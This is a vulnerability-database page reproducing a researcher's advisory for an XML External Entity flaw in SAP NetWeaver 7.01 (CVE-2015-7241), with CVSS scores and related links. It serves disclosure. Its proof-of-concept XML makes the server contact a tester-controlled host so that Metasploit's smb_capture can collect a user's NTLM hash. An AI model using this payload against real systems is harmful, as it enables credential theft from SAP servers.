Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
exploitpackLukasz MiedzinskiEXPLOITPACK:B41435F63433FA571A29C3D54207AFD9
HistorySep 22, 2015 - 12:00 a.m.

SAP NetWeaver 7.01 - XML External Entity Injection

2015-09-2200:00:00
Lukasz Miedzinski
8

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

7.5 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

JSON

SAP NetWeaver 7.01 - XML External Entity Injection

Title: SAP Netwaver - XML External Entity Injection
Author: Lukasz Miedzinski
GPG: Public key provided in attachment
Date: 29/10/2014
CVE: CVE-2015-7241

Affected software :
===================

SAP Netwear : <7.01

Vendor advisories (only for customers):
===================
External ID : 851975 2014
Title:  XML External Entity vulnerability in SAP XML Parser
Security Note: 2098608
Advisory Plan Date: 12/5/2014
Delivery date of fix/Patch Day: 10/2/2014
CVSS Base Score: 5.5
CVSS Base Vector: AV:N/AC:L/AU:S/C:P/I:N/A:P


Description :
=============
XML External Entity Injection vulnerability has been found in the XML
parser in the System

Administration->XML Content and Actions -> Import section.


Vulnerabilities :
*****************

XML External Entity Injection :
======================


Example show how pentester is able to get NTLM hash of application's user.

Content of file (PoC) :

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "file:////Tester.IP/test"> %remote; %param1; ]>
<root/>

When pentester has metasploit smb_capture module run, then application
will contatc him and provide

NTLM hash of user.


Contact :
=========

Lukasz[dot]Miedzinski[at]gmail[dot]com

Related

packetstorm 1
cve 1
prion 1
securityvulns 2
exploitdb 1
packetstorm
packetstorm
SAP Netweaver XML External Entity Injection
2015-09-21 00:00:00
cve
cve
CVE-2015-7241
2017-09-06 21:29:00
prion
prion
Xxe
2017-09-06 21:29:00
securityvulns
securityvulns
SAP NetWeaver security vulnerabilities
2015-10-25 00:00:00
SAP Netwaver - XML External Entity Injection
2015-10-25 00:00:00
exploitdb
exploitdb
SAP NetWeaver &lt; 7.01 - XML External Entity Injection
2015-09-22 00:00:00

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

7.5 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

JSON
Related for EXPLOITPACK:B41435F63433FA571A29C3D54207AFD9
packetstorm1cve1prion1securityvulns2exploitdb1